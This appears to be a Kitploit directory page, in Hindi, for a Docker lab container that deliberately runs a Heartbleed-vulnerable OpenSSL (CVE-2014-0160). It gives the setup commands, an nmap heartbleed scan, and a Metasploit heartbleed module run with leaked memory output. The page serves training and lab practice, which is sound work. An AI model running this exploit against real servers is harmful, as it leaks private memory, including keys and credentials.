Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vaas-cve-2014-0160 — भेद्यता एक सेवा के रूप में: CVS-2014-0160, उर्फ Heartbleed का प्रदर्शन | Kitploit
उपकरण/GitHubGitHub/hmlio/vaas-cve-2014-0160
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubhmlio/vaas-cve-2014-0160

vaas-cve-2014-0160

भेद्यता एक सेवा के रूप में: CVS-2014-0160, उर्फ Heartbleed का प्रदर्शन

रिपॉजिटरी देखें
15636 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सेवा के रूप में भेद्यता - CVE 2014-0160

एक डेबियन (Wheezy) लिनक्स सिस्टम जिसमें libssl और openssl का एक भेद्य संस्करण और एक वेब सर्वर है जो CVS-2014-0160, जिसे Heartbleed के नाम से भी जाना जाता है, को प्रदर्शित करता है।

अवलोकन

यह डॉकर कंटेनर डेबियन Jessie पर आधारित है और इसे libssl और openssl के एक भेद्य संस्करण का उपयोग करने के लिए संशोधित किया गया है।

Apache 2 के माध्यम से एक सरल स्थिर वेब पृष्ठ परोसा जाता है।

उपयोग

कंटेनर को इस प्रकार स्थापित करें: docker pull hmlio/vaas-cve-2014-0160

कंटेनर को पोर्ट मैपिंग के साथ चलाएँ: docker run -d -p 8443:443 hmlio/vaas-cve-2014-0160

आपको वेब एप्लिकेशन http://your-ip:8443/ पर एक्सेस करने में सक्षम होना चाहिए।

जाँच

वेब सर्वर/भेद्य openssl/libssl संस्करण को नीचे दिखाए अनुसार सत्यापित और शोषण किया जा सकता है (Kali मशीन का उपयोग करने की अनुशंसा की जाती है):

root@kitploit:~
root@kali:~/vaas-cve-2014-0160# nmap -sV -p 8443 --script=ssl-heartbleed your-ip
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-26 17:31 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000068s latency).
Other addresses for localhost (not scanned): ::1

PORT     STATE SERVICE VERSION
8443/tcp open  ssl/ssl Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.10 (Debian)
| ssl-heartbleed: 
|   VULNERABLE:
|   The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
|     State: VULNERABLE
|     Risk factor: High
|       OpenSSL versions 1.0.1 and 1.0.2-beta releases (including 1.0.1f and 1.0.2-beta1) of OpenSSL are affected by the Heartbleed bug. The bug allows for reading memory of systems protected by the vulnerable OpenSSL versions and could allow for disclosure of otherwise encrypted confidential information as well as the encryption keys themselves.
|           
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
|       http://cvedetails.com/cve/2014-0160/
|_      http://www.openssl.org/news/secadv_20140407.txt 

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.61 seconds

शोषण

root@kitploit:~
Using msfcli from the Metasploit framework:
root@kali:/tmp# msfcli auxiliary/scanner/ssl/openssl_heartbleed RHOSTS=your-ip RPORT=8443 VERBOSE=true E

...
...
[*] 192.168.179.230:8443 - Sending Heartbeat...
[*] 192.168.179.230:8443 - Heartbeat response, 65535 bytes
[+] 192.168.179.230:8443 - Heartbeat response with leak
[*] 192.168.179.230:8443 - Printable info leaked: U`tcz~8}"V2|vf3<tf"!98532ED/A/39.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip
टूल डाउनलोड करें